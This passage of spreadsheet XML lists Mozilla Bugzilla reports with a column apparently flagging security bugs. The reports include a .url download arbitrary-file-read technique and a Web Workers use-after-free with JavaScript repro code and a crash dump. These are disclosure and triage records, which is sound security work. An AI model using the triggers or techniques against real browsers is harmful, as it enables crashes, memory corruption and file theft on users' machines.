        </is>
      </c>
      <c r="T1190" t="n">
        <v>1</v>
      </c>
      <c r="U1190" t="n">
        <v>0</v>
      </c>
      <c r="V1190" t="n">
        <v>49</v>
      </c>
      <c r="W1190" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Steps to reproduce:
Download and run these files:
Known malware: https://demo.smartscreen.msft.net/download/known/knownmalicious.exe
Unknown program: https://demo.smartscreen.msft.net/download/unknown/freevideo.exe
Offline: Any of the above with internet on the machine off
More details about the issue:
In the next Windows Release (Redstone 4), Windows Defender SmartScreen will honor the SEE_MASK_FLAG_NO_UI flag. This flag is passed through shellexecute when a user runs an executable, or other supported file, through the firefox download manager. Edge/Windows Explorer do not pass this flag and are unaffected.
There are three problematic scenarios
1. Known malware - Blocked silently: We will not show any SmartScreen UI for these types of files, but the user will have no opportunity to override the block through firefox. The user will not have any indication that executing the file did anything.
2. Unknowns - The file is unknown to our service. This is a large number of files and all will be allowed. There is a chance for polymorphic malware to be bucketed here.
3. Offline - User is unable to contact smartscreen. Always allowed.
When SEE_MASK_FLAG_NO_UI is not set, all 3 cases will result in a block experience for the user.
Actual results:
Files are not run. They are silently blocked
Expected results:
Files are not run. They are blocked by SmartScreen.</t>
        </is>
      </c>
      <c r="X1190" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" t="n">
        <v>231037</v>
      </c>
      <c r="B1191" t="inlineStr">
        <is>
          <t>2004-01-15 15:19:33 -0800</t>
        </is>
      </c>
      <c r="C1191" t="inlineStr">
        <is>
          <t>Remove irritating JS popup from bug creation screen</t>
        </is>
      </c>
      <c r="D1191" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E1191" t="n">
        <v>1</v>
      </c>
      <c r="F1191" t="n">
        <v>1</v>
      </c>
      <c r="G1191" t="n">
        <v>4</v>
      </c>
      <c r="H1191" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1191" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1191" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1191" t="inlineStr">
        <is>
          <t>2.17.3</t>
        </is>
      </c>
      <c r="L1191" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1191" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1191" t="inlineStr"/>
      <c r="Q1191" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1191" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1191" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1191" t="n">
        <v>1</v>
      </c>
      <c r="U1191" t="n">
        <v>0</v>
      </c>
      <c r="V1191" t="n">
        <v>5</v>
      </c>
      <c r="W1191" t="inlineStr">
        <is>
          <t>We've been meaning to do this for a while. The JS auto-fill of Assigned To on
the bug creation screen is all very well, but the popup you get when you've
typed one in and then change component is wrong. 
I remember we said this a while back, but never got around to fixing it. Now's
the time, as we are about to go live on b.m.o. :-)
Gerv</t>
        </is>
      </c>
      <c r="X1191" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" t="n">
        <v>782581</v>
      </c>
      <c r="B1192" t="inlineStr">
        <is>
          <t>2012-08-14 02:53:11 -0700</t>
        </is>
      </c>
      <c r="C1192" t="inlineStr">
        <is>
          <t>Subverting Same-Origin Policy for Local Contents by Symbolic Link</t>
        </is>
      </c>
      <c r="D1192" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:20 -0700</t>
        </is>
      </c>
      <c r="E1192" t="n">
        <v>1</v>
      </c>
      <c r="F1192" t="n">
        <v>1</v>
      </c>
      <c r="G1192" t="n">
        <v>3</v>
      </c>
      <c r="H1192" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1192" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1192" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1192" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1192" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1192" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1192" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1192" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q1192" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1192" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1192" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T1192" t="n">
        <v>1</v>
      </c>
      <c r="U1192" t="n">
        <v>0</v>
      </c>
      <c r="V1192" t="n">
        <v>36</v>
      </c>
      <c r="W1192" t="inlineStr">
        <is>
          <t>Created attachment 651674
vulnerability report
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Build ID: 20120713134347
Steps to reproduce:
I created an example of malicious Android app
that steals Firefox's private files such as a file storing Cookie.
(Please see the attached file.)
Actual results:
The malicious app gained access to Firefox's private files.
(Please see the attached file.)
Expected results:
The access should have been prohibited.
(Please see the attached file.)</t>
        </is>
      </c>
      <c r="X1192" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" t="n">
        <v>1809923</v>
      </c>
      <c r="B1193" t="inlineStr">
        <is>
          <t>2023-01-12 07:49:07 -0800</t>
        </is>
      </c>
      <c r="C1193" t="inlineStr">
        <is>
          <t>.url extension Download leads to Arbitrary File Read</t>
        </is>
      </c>
      <c r="D1193" t="inlineStr">
        <is>
          <t>2024-05-30 11:03:47 -0700</t>
        </is>
      </c>
      <c r="E1193" t="n">
        <v>1</v>
      </c>
      <c r="F1193" t="n">
        <v>1</v>
      </c>
      <c r="G1193" t="n">
        <v>2</v>
      </c>
      <c r="H1193" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1193" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1193" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1193" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1193" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1193" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1193" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1193" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q1193" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1193" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1193" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T1193" t="n">
        <v>1</v>
      </c>
      <c r="U1193" t="n">
        <v>0</v>
      </c>
      <c r="V1193" t="n">
        <v>50</v>
      </c>
      <c r="W1193" t="inlineStr">
        <is>
          <t>Created attachment 9311999
Firefox - UrlExtension Dangerous File Extension.mp4
Chromium Bug Reference: https://bugs.chromium.org/p/chromium/issues/detail?id=1307930
While visiting a webpage if the download initiate for  .lnk/ .local these file types are changed to .download by firefox. But i have found a way to download .url File while lead to Arbitrary File Read
Note: .local/ .lnk are already restricted and .url is missed
We can use Blob Method with type text to download the .url file without changing it to .download
FIREFOX VERSION : 108.0.2 (64-bit)
REPRODUCTION CASE:
.Url Download POC
1. Open the Below Attached HTML
2. You can See the .Url file Downloaded
.Url Download Arbitrary File Read POC
1. Open the Below Same Attached HTML
2. You can See the .URL File Downloaded
3. Upload the same file in the Upload Button
4. You can See the content of system.ini file
I have also attached the POC Video for your reference</t>
        </is>
      </c>
      <c r="X1193" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" t="n">
        <v>610601</v>
      </c>
      <c r="B1194" t="inlineStr">
        <is>
          <t>2010-11-09 00:23:08 -0800</t>
        </is>
      </c>
      <c r="C1194" t="inlineStr">
        <is>
          <t>Firefox crash [@ ycc_rgb_convert] [@ ycc_rgb_convert_argb] on image with src set to a resource with multipart/x-mixed-replace content type [Access Violation]</t>
        </is>
      </c>
      <c r="D1194" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:49 -0700</t>
        </is>
      </c>
      <c r="E1194" t="n">
        <v>1</v>
      </c>
      <c r="F1194" t="n">
        <v>1</v>
      </c>
      <c r="G1194" t="n">
        <v>3</v>
      </c>
      <c r="H1194" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1194" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1194" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1194" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1194" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1194" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1194" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1194" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1194" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1194" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1194" t="inlineStr">
        <is>
          <t>mozilla2.0b8</t>
        </is>
      </c>
      <c r="T1194" t="n">
        <v>1</v>
      </c>
      <c r="U1194" t="n">
        <v>0</v>
      </c>
      <c r="V1194" t="n">
        <v>37</v>
      </c>
      <c r="W1194" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Visiting a webpage that contains an image with the src-attribute that refers to a multipart/x-mixed-replace resource , Firefox 3.6.12 crashes after some time.
Exactly the same as bug 524921
Tested on Windows 7
Reproducible: Always
Steps to Reproduce:
1. Visit test page
2. wait a few moments
Actual Results:  
Firefox crashes
Expected Results:  
Firefox don't crash
The crash is very intermittent , sometimes firefox will crash after some seconds , and sometimes firefox don't crash at all.</t>
        </is>
      </c>
      <c r="X1194" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" t="n">
        <v>1473167</v>
      </c>
      <c r="B1195" t="inlineStr">
        <is>
          <t>2018-07-03 15:27:50 -0700</t>
        </is>
      </c>
      <c r="C1195" t="inlineStr">
        <is>
          <t>'Retrigger All' doesn't provide any feedback</t>
        </is>
      </c>
      <c r="D1195" t="inlineStr">
        <is>
          <t>2018-07-13 22:10:40 -0700</t>
        </is>
      </c>
      <c r="E1195" t="n">
        <v>1</v>
      </c>
      <c r="F1195" t="n">
        <v>1</v>
      </c>
      <c r="G1195" t="n">
        <v>7</v>
      </c>
      <c r="H1195" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1195" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1195" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K1195" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1195" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1195" t="inlineStr"/>
      <c r="Q1195" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1195" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1195" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1195" t="n">
        <v>1</v>
      </c>
      <c r="U1195" t="n">
        <v>0</v>
      </c>
      <c r="V1195" t="n">
        <v>3</v>
      </c>
      <c r="W1195" t="inlineStr">
        <is>
          <t>Go to https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=c8f53da5b34049a856770045725b5ea1252746fd&amp;filter-searchStr=talos&amp;group_state=expanded&amp;selectedJob=186274324 and click on a job.
Hit spacebar to add it to the pinboard
Select the "retrigger all" action from the dropdown on the save button
Expected: jobs are retriggered and the little green confirmation box shows up
Actual: jobs are retriggered, but the green confirmation box doesn't show up
If I retrigger a job individually clicking on it and hitting 'r' I do get the confirmation box as expected. It's just the 'retrigger all' that's not giving the confirmation.</t>
        </is>
      </c>
      <c r="X1195" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" t="n">
        <v>1418074</v>
      </c>
      <c r="B1196" t="inlineStr">
        <is>
          <t>2017-11-16 13:10:24 -0800</t>
        </is>
      </c>
      <c r="C1196" t="inlineStr">
        <is>
          <t>Web Workers - Use After Free in nsWrapperCache::GetWrapperPreserveColor()</t>
        </is>
      </c>
      <c r="D1196" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:31 -0700</t>
        </is>
      </c>
      <c r="E1196" t="n">
        <v>1</v>
      </c>
      <c r="F1196" t="n">
        <v>1</v>
      </c>
      <c r="G1196" t="n">
        <v>3</v>
      </c>
      <c r="H1196" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1196" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1196" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1196" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1196" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1196" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1196" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1196" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1196" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1196" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1196" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1196" t="n">
        <v>1</v>
      </c>
      <c r="U1196" t="n">
        <v>0</v>
      </c>
      <c r="V1196" t="n">
        <v>29</v>
      </c>
      <c r="W1196" t="inlineStr">
        <is>
          <t>Created attachment 8929156
UAF_GetWrapperPreserveColor_Repro.js
Reproduction test case (full server code in attached file UAF_GetWrapperPreserveColor_Repro.js):
	Main Page code:
		&lt;script type="text/javascript"&gt;
		var worker = new Worker("worker0.js");
		var bc0 = new BroadcastChannel("test_channel");
		setTimeout(function(){
		try{ bc0.postMessage("n82z8laAh2f004");}catch(e){}
		}, 10);
		 setTimeout(function(){location.reload();},300); 
		&lt;/script&gt;
	Worker code:
		onerror  = function (e) {fetch("./fetchedfile0.html", {signal:abortSig0}).then(function(res) {res.text().then(function(txt) {}).catch(function(error) {});}).catch(function(error) {});
		 };
		var abortCtl0 = new AbortController();
		var abortSig0 = abortCtl0.signal;
		var bc0 = new BroadcastChannel("test_channel");
		setInterval(function(){
		try{ bc0.postMessage("");}catch(e){}
		 xmlReq0.setRequestHeader("X-Custom-Header", "");
		try{ close();} catch(e){}
		}, 32);
		var xmlReq0 = new XMLHttpRequest();
Steps to reproduce: 
	1. Run server side script UAF_GetWrapperPreserveColor_Repro.js with Node.js (node UAF_GetWrapperPreserveColor_Repro.js).
	2. Enter http://localhost:12345 in Firefox browser.
	3. Firefox crashes in nsWrapperCache::GetWrapperPreserveColor()  by accessing freed memory:
		(3120.42b0): Access violation - code c0000005 (!!! second chance !!!)
		eax=4f4f4f4f ebx=12dba798 ecx=00598154 edx=2422d060 esi=00598154 edi=0056a2a4
		eip=1029c3d0 esp=008bea34 ebp=008bea3c iopl=0         nv up ei pl nz na po nc
		cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
		xul!JS::shadow::Zone::isGCSweepingOrCompacting+0x2 [inlined in xul!nsWrapperCache::GetWrapperPreserveColor+0x2c]:
		1029c3d0 8a400c          mov     al,byte ptr [eax+0Ch]      ds:002b:4f4f4f5b=??
Firefox version: 59.0a1 (2017-11-16) (32-bit)
OS: Windows 10
Stack trace:
	(3120.42b0): Access violation - code c0000005 (!!! second chance !!!)
	eax=4f4f4f4f ebx=12dba798 ecx=00598154 edx=2422d060 esi=00598154 edi=0056a2a4
	eip=1029c3d0 esp=008bea34 ebp=008bea3c iopl=0         nv up ei pl nz na po nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
	xul!JS::shadow::Zone::isGCSweepingOrCompacting+0x2 [inlined in xul!nsWrapperCache::GetWrapperPreserveColor+0x2c]:
	1029c3d0 8a400c          mov     al,byte ptr [eax+0Ch]      ds:002b:4f4f4f5b=??
	2:024&gt; !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************
	FAULTING_IP: 
	xul!nsWrapperCache::GetWrapperPreserveColor+2c [z:\build\build\src\dom\base\nswrappercacheinlines.h @ 18]
	1029c3d0 8a400c          mov     al,byte ptr [eax+0Ch]
	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 1029c3d0 (xul!JS::shadow::Zone::isGCSweepingOrCompacting+0x00000002)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: 4f4f4f5b
	Attempt to read from address 4f4f4f5b
	FAULTING_THREAD:  00001020
	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ
	PROCESS_NAME:  firefox.exe
	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
	EXCEPTION_PARAMETER1:  00000000
	EXCEPTION_PARAMETER2:  4f4f4f5b
	READ_ADDRESS:  4f4f4f5b 
	FOLLOWUP_IP: 
	xul!nsWrapperCache::GetWrapperPreserveColor+2c [z:\build\build\src\dom\base\nswrappercacheinlines.h @ 18]
	1029c3d0 8a400c          mov     al,byte ptr [eax+0Ch]
	BUGCHECK_STR:  INVALID_POINTER_READ
	NTGLOBALFLAG:  400
	APPLICATION_VERIFIER_FLAGS:  0
	APP:  firefox.exe
	ANALYSIS_VERSION: 10.0.10240.9 x86fre
	LAST_CONTROL_TRANSFER:  from 104a6319 to 1029c3d0
	STACK_TEXT:  
	008bea3c 104a6319 11574d73 0056a2a4 008beaf8 xul!nsWrapperCache::GetWrapperPreserveColor+0x2c
	008bea40 11574d73 0056a2a4 008beaf8 12dba798 xul!nsWrapperCache::HasKnownLiveWrapper+0x5
	008bea54 10b27c3e 12dba798 00598150 00000000 xul!mozilla::DOMEventTargetHelper::cycleCollection::CanSkipReal+0x11
	008bea78 10b247a5 005f4224 12dba798 12a722a0 xul!RemoveSkippableVisitor::Visit+0x9b
	008beae4 10b27409 008beaf8 008bebb0 005f4190 xul!nsPurpleBuffer::VisitEntries&lt;RemoveSkippableVisitor&gt;+0xdc
	008beb1c 10b262a6 005f4190 008bebb0 00000000 xul!nsPurpleBuffer::RemoveSkippable+0x44
	008beb54 10b27f1d 008bebb0 00000000 008bec01 xul!nsCycleCollector::ForgetSkippable+0x6b
	008beb7c 111110e6 008bec01 008bec48 008bec94 xul!nsCycleCollector_forgetSkippable+0x46
	008bec28 1110f09e 00000000 00000000 00000000 xul!FireForgetSkippable+0xab
	008bec74 104d805f 00000000 00000000 00000000 xul!CCRunnerFired+0x1d6
	008bec9c 104d6bba 008becc0 1f037fe8 05cdf3a0 xul!std::_Func_impl_no_alloc&lt;bool (__cdecl*)(mozilla::TimeStamp),bool,mozilla::TimeStamp&gt;::_Do_call+0x17
	008becf0 104d6b4b 05cdf3a0 1f037fbc 008bede4 xul!mozilla::IdleTaskRunner::Run+0x62
	008bed00 104837a6 005bb9d0 05cdf3a0 12db9e50 xul!mozilla::TimedOut+0x17
	008bede4 1048367d 00000001 008bf3c0 05cde3c0 xul!nsTimerImpl::Fire+0x11f
	008bee1c 10b3d4da 1f863124 008bf3c0 00537c10 xul!nsTimerEvent::Run+0x37
	008bee5c 101254ba 05cde3c0 00501200 005011f0 xul!mozilla::SchedulerGroup::Runnable::Run+0x4f
	008bf3c8 10254d2a 00537c10 00000000 008bf3f3 xul!nsThread::ProcessNextEvent+0x294
	008bf3f4 10ce59ab 008bf570 008bf570 00503040 xul!mozilla::ipc::MessagePump::Run+0x75
	008bf410 104d115d 008bf570 a33ff06a 05b81f70 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x58
	008bf448 104d111d 00537c10 00000002 00503000 xul!MessageLoop::RunHandler+0x1f
	008bf468 1066508c 05b81f70 008bf570 008bf488 xul!MessageLoop::Run+0x19
	008bf478 10664e18 05b81f70 05b81f70 008bf4a0 xul!nsBaseAppShell::Run+0x34
	008bf488 12348b3b 05b81f70 008bf570 005011f0 xul!nsAppShell::Run+0x26
	008bf4a0 10ce5969 008bf570 005011f0 008bf4e8 xul!XRE_RunAppShell+0x30
	008bf4b0 104d115d 008bf570 a33ff0ca 00000013 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x16
	008bf4e8 104d111d 00519800 00000001 125ad300 xul!MessageLoop::RunHandler+0x1f
	008bf508 123489c4 005060f0 00000016 00503040 xul!MessageLoop::Run+0x19
	008bf62c 1234b796 008bf658 008bf660 009295cf xul!XRE_InitChildProcess+0x4bd
	008bf638 009295cf 00000016 00503040 008bf658 xul!mozilla::BootstrapImpl::XRE_InitChildProcess+0x11
	008bf660 009264d8 00503040 00182970 74bd9304 firefox!content_process_main+0x74
	008bf9b8 009251f9 00000017 ffc7f930 00183478 firefox!wmain+0x5478
	008bfa00 76898744 00a0c000 76898720 c740e5a1 firefox!__scrt_common_main_seh+0xf8
	008bfa14 770b582d 00a0c000 c6c4fbfd 00000000 KERNEL32!BaseThreadInitThunk+0x24
	008bfa5c 770b57fd ffffffff 770d6374 00000000 ntdll!__RtlUserThreadStart+0x2f
	008bfa6c 00000000 0092526f 00a0c000 00000000 ntdll!_RtlUserThreadStart+0x1b
	FAULTING_SOURCE_LINE:  z:\build\build\src\dom\base\nswrappercacheinlines.h
	FAULTING_SOURCE_FILE:  z:\build\build\src\dom\base\nswrappercacheinlines.h
	FAULTING_SOURCE_LINE_NUMBER:  18
	SYMBOL_STACK_INDEX:  0
	SYMBOL_NAME:  xul!nsWrapperCache::GetWrapperPreserveColor+2c
	FOLLOWUP_NAME:  MachineOwner
	MODULE_NAME: xul
	IMAGE_NAME:  xul.dll
	DEBUG_FLR_IMAGE_TIMESTAMP:  5a0d7710
	STACK_COMMAND:  ~24s ; kb
	BUCKET_ID:  INVALID_POINTER_READ_xul!nsWrapperCache::GetWrapperPreserveColor+2c
	PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_xul!nsWrapperCache::GetWrapperPreserveColor+2c
	FAILURE_PROBLEM_CLASS:  INVALID_POINTER_READ
	FAILURE_EXCEPTION_CODE:  c0000005
	FAILURE_IMAGE_NAME:  xul.dll
	FAILURE_FUNCTION_NAME:  nsWrapperCache::GetWrapperPreserveColor
	FAILURE_SYMBOL_NAME:  xul.dll!nsWrapperCache::GetWrapperPreserveColor
	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_xul.dll!nsWrapperCache::GetWrapperPreserveColor
	ANALYSIS_SOURCE:  UM
	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_c0000005_xul.dll!nswrappercache::getwrapperpreservecolor
	FAILURE_ID_HASH:  {2ed7a18c-a2cc-a85d-619a-216c25b2cb62}
	Followup:     MachineOwner
	---------</t>
        </is>
      </c>
      <c r="X1196" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" t="n">
        <v>903363</v>
      </c>
      <c r="B1197" t="inlineStr">
        <is>
          <t>2013-08-09 03:54:48 -0700</t>
        </is>
      </c>
      <c r="C1197" t="inlineStr">
        <is>
          <t>[HD] Arrows on utility tray are still SD</t>
        </is>
      </c>
      <c r="D1197" t="inlineStr">
        <is>
          <t>2013-09-06 04:39:17 -0700</t>
        </is>
      </c>
      <c r="E1197" t="n">
        <v>1</v>
      </c>
      <c r="F1197" t="n">
        <v>1</v>
      </c>
      <c r="G1197" t="n">
        <v>6</v>
      </c>
      <c r="H1197" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1197" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1197" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K1197" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1197" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1197" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1197" t="inlineStr">
        <is>
          <t>helix vsd, HD</t>
        </is>
      </c>
      <c r="Q1197" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1197" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1197" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1197" t="n">
        <v>1</v>
      </c>
      <c r="U1197" t="n">
        <v>0</v>
      </c>
      <c r="V1197" t="n">
        <v>19</v>
      </c>
      <c r="W1197" t="inlineStr">
        <is>
          <t>Created attachment 788075
Notification Tray - Arrows.png
Pavel, the arrows on the utility tray are still in SD.  I wasn't able to find the current graphic, can you send a link to the image being used so we can attach a unscaled version. Thanks!</t>
        </is>
      </c>
      <c r="X1197" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" t="n">
        <v>1392955</v>
      </c>
      <c r="B1198" t="inlineStr">
        <is>
          <t>2017-08-23 01:26:34 -0700</t>
        </is>
      </c>
      <c r="C1198" t="inlineStr">
        <is>
          <t>JNLP should be treated as executable</t>
        </is>
      </c>
      <c r="D1198" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:10 -0700</t>
        </is>
      </c>
      <c r="E1198" t="n">
        <v>1</v>
      </c>
      <c r="F1198" t="n">
        <v>1</v>
      </c>
      <c r="G1198" t="n">
        <v>2</v>
      </c>
      <c r="H1198" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1198" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1198" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1198" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L1198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1198" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1198" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main67+]</t>
        </is>
      </c>
      <c r="Q1198" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1198" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1198" t="inlineStr">
        <is>
          <t>Firefox 67</t>
        </is>
      </c>
      <c r="T1198" t="n">
        <v>1</v>
      </c>
      <c r="U1198" t="n">
        <v>0</v>
      </c>
      <c r="V1198" t="n">
        <v>28</v>
      </c>
      <c r="W1198" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Steps to reproduce:
The .JNLP (Java web start app) should be treated as executable.
Visit: https://docs.oracle.com/javase/tutorial/deployment/webstart/deploying.html
Press 'Launch' 
Actual results:
